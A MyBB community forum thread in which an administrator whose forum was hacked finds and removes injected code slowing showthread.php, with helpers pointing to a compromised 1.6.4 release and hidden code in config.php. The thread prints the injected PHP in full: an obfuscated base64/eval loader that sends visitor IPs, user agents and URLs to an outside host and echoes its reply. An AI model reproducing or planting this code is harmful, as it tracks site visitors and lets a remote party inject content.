MyBB Community Forums

Full Version: Forum speed/hack problem
You're currently viewing a stripped down version of our content. View the full version with proper formatting.

Basically my forum had a warning threat which popped up when you went onto it Confused after some research we found out over 3,000,000 sites were effected. My problem now is fixing this as there is some code somwhere in the index which is lagging the site so much.

Going onto the forum is now fixed as there was some corrupt code removed. its just when you click a post it takes for ever Confused

Could anyone give me a heads up on how to fix this as i dont have any backups from before the site was hit?>

Kind regards
Hmm, only the showthread page seems to be affected. The rest of the site loads nicely. I don't see anything out of the ordinary in your source code that could be slowing down page loads, but I'd re-upload the showthread.php file from a fresh download just to be sure? Also, what does your debug info (at the bottom) say? And which plugins do you have installed?

I looked at the showthread html source and saw nothing out of the norm.. Post the showthread.php contents here maybe?
Ok i looked in the showthread file and found the same code that was causing the index page to lag:

?><?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>

Code removed and all speedy once again.

Thanks for the reply guys
Glad you found the culprit. It appears as if this was part of the 1.6.4 exploit that was maliciously added by a third party after hacking MyBB's CMS.

FWIW: Check your config.php file for any malicious code. There are many that have said that there was code similar to what you just posted in config.php. Make sure to scroll all the way, as some have said that several blank lines were created to prevent the administrator from noticing it...

Hope this helps. If this helps with nothing, it is better to be safe than sorry.
No problems thanks for the headsup.